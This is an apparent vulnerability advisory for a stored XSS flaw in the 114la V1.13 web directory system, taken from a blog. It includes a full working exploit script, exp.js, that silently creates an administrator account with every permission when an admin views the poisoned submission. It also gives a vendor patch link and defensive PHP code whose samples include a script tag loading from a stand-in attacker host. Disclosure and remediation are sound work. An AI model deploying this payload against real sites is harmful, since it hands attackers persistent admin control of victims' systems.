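Affected versions:
114la V1.13
Program description:
The 114la web directory is currently one of the most widely used web directories in China. This web directory generation system was developed in-house by YLMF (雨林木风).
Vulnerability analysis:
/url-submit/index.php in the program inserts submitted data directly into the database without filtering or encoding it, which results in a stored XSS vulnerability.
Exploitation:
exp.js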
// Add an administrator account
var siteurl = document.URL;
siteurl = siteurl.replace(/(.*\/){0,}([^\.]+).*/ig,"$1");
var username="sogili"; // username
var password="sb250"; // password
var request = false;
if(window.XMLHttpRequest) {
    request = new XMLHttpRequest();
    if(request.overrideMimeType) {
        request.overrideMimeType('text/xml');
    }
} else if(window.ActiveXObject) {
    var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
    for(var i=0; i<versions.length; i++) {
        try {
            request = new ActiveXObject(versions[i]);
        } catch(e)
        {}
    }
}
var xmlhttp=request;
xmlhttp.open("GET",siteurl+"/index.php?c=member", false);
xmlhttp.setRequestHeader("Referer", siteurl);
xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
xmlhttp.send();
if (xmlhttp.responseText.indexOf(username)<0) {
    xmlhttp.open("POST", siteurl + "/index.php?c=member&a=member_add", false);
    xmlhttp.setRequestHeader("Referer", siteurl);
    xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    xmlhttp.send("name=" + username + "&password=" + password + "&step=2");
    xmlhttp.open("POST", siteurl + "/index.php?c=member&a=member_edit", false);
    xmlhttp.setRequestHeader("Referer", siteurl);
    xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    xmlhttp.send("auth%5Bmember114laurl_add114lafeedback%5D=1&auth%5Bconfig114la%5D=1&auth%5Bfamous_nav114lafamous_loop_playfamous_nav_tab114laindex_site114laindex_tool114lamztopl114larecycler%5D=1&auth%5Bzhuanti114lazhuanti_class%5D=1&auth%5Badvise_index114lakey%5D=1&auth%5Bbackup114larestore114larepair114laclear114lamysites%5D=1&auth%5Btemplate_manage%5D=1&auth%5Bmake_html114la%5D=1&auth%5Bheader114lamenu114lawelcome114laframe114lalogin%5D=1&auth%5Bsecurity114la%5D=1&auth%5Bsite_manage%5D=1&auth%5Bplan%5D=1&auth%5Bclass%5D=1&auth%5Blog%5D=1&step=2&name=" + username);
}
Solution:
Vendor patch:
114la
-----
The vendor has released an upgrade patch that fixes this security issue. Download it from the vendor's home page:
http://www.xiazaiba.com/html/114.html
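
The fix pattern for the flaw described in the vulnerability analysis, as an added example (not 114la's code and not the vendor's patch): validate the submitted URL on input and HTML-encode every stored field when the admin back end renders it. The field names `name` and `url`, the function names and the sample submissions are assumptions.

```php
<?php
// Added example. Field and function names are hypothetical, not 114la's own.

// Input side: bounded text and a plain http(s) URL only.
function validate_submission(array $in): ?array
{
    $name = trim((string)($in['name'] ?? ''));
    $url  = trim((string)($in['url'] ?? ''));
    if ($name === '' || strlen($name) > 120 || strlen($url) > 255) {
        return null;
    }
    if (filter_var($url, FILTER_VALIDATE_URL) === false) {
        return null;
    }
    // FILTER_VALIDATE_URL does not restrict the scheme, so allow-list it.
    $scheme = strtolower((string)parse_url($url, PHP_URL_SCHEME));
    if (!in_array($scheme, ['http', 'https'], true)) {
        return null;
    }
    return ['name' => $name, 'url' => $url];
}

// Output side: encode at render time, whatever the database holds.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Row of the admin review list, built from a stored submission.
function render_review_row(array $row): string
{
    return '<tr><td>' . h($row['name']) . '</td><td><a href="' . h($row['url'])
        . '" rel="noopener noreferrer">' . h($row['url']) . "</a></td></tr>\n";
}

// Constructed sample submissions.
$samples = [
    ['name' => 'Example site', 'url' => 'https://www.example.com/'],
    ['name' => '<script src="//attacker.example/exp.js"></script>',
     'url'  => 'http://www.example.com/'],
    ['name' => 'Click me', 'url' => 'javascript:alert(1)'],
];
foreach ($samples as $s) {
    $row = validate_submission($s);
    // The second sample passes validation but renders as inert text.
    echo $row === null ? "rejected\n" : render_review_row($row);
}
```

Encoding on output is the part that neutralises markup already stored by earlier submissions; input validation alone does not.
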
Source:
<*Source: Sogili's blog
Link: http://www.sogili.com/?action=show&id=2
*>